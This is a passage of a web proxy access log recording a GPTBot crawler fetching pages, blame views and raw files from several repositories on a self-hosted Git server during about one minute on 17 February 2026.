(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43084] [Gzip 19.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 21628] [Gzip 11.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 14956] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 42629] [Gzip 12.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 22665] [Gzip 10.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 95648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 20745] [Gzip 9.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 43288] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 23859] [Gzip 9.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 38982] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:15:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7812] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" +[17/Feb/2026:15:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 54915] [Gzip 18.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10144] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main" [Client 74.7.227.38] [Length 10700] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/branches" +[17/Feb/2026:15:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj?display=source" [Client 74.7.227.38] [Length 11509] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:15:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9835] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/reactor.png" +[17/Feb/2026:15:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9830] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/bearing.png" +[17/Feb/2026:15:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest" [Client 74.7.227.38] [Length 11884] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:15:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:15:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10082] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" +[17/Feb/2026:15:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20906] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14312] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15804] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18122] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:15:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:15:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:15:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:15:47:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:15:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest" +[17/Feb/2026:15:47:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:15:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest" +[17/Feb/2026:15:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15765] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10309] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9949] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9962] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PythonTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:15:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PythonTest" +[17/Feb/2026:15:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" +[17/Feb/2026:15:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" +[17/Feb/2026:15:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15558] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" +[17/Feb/2026:15:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14212] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" +[17/Feb/2026:15:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" +[17/Feb/2026:15:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13891] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" +[17/Feb/2026:15:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17252] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] 